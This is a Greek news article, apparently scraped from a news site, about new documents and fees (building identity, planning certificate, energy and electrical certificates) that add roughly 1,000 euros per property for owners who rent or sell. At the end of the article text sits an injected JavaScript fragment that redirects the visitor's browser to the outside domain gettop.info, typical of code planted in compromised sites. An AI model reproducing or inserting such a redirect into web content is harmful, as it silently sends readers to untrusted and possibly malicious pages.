Νέο «χαράτσι» στα ακίνητα – 1.000 € επιπλέον για ενοίκιο ή πώληση

0
45

 

Νέα χαράτσια προστίθεται στον ΕΝΦΙΑ και αφορά ακίνητα που δίνονται για ενοικίαση ή μεταβίβαση.

Οι ιδιοκτήτες ακινήτων που θα θελήσουν να νοικιάσουν ή να μεταβιβάσουν ένα ακίνητο θα πρέπει να έχουν: Ηλεκτρονική ταυτότητα κτιρίου, Πιστοποιητικό πολεοδομικής νομιμότητας, Βεβαίωση καταβολής ΤΑΠ (τέλος που εισπράττεται από τους δήμους μέσω του λογαριασμού της ΔΕΗ). Επίσης εκτός από αυτά πρέπει να έχουν ενεργειακό πιστοποιητικό και πιστοποιητικό ηλεκτρολογικής εγκατάστασης.

Με βάση τους υπολογισμούς παραγόντων της αγοράς που επικαλείται η «Καθημερινή», αυτά τα τρία νέα έγγραφα αυξάνουν το κόστος για κάθε ένα από τα ακίνητα που έχει στην κατοχή του ο ιδιοκτήτης στα 1.000 ευρώ.

Μάλιστα στην περίπτωση της Ταυτότητας Κτιρίου, της οποίας το κόστος υπολογίζεται μίνιμουμ στα 300 με 400 ευρώ και θα πρέπει να εκδοθεί μέσα στα επόμενα πέντε χρόνια, οι ιδιοκτήτες θα πρέπει να την ανανεώνουν ανά επτά έτη, γεγονός που ανεβάζει το κόστος, καθώς η κάθε ανανέωση απαιτείται να γίνεται από μηχανικό, ο οποίος έχει αμοιβή τουλάχιστον 300 ευρώ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here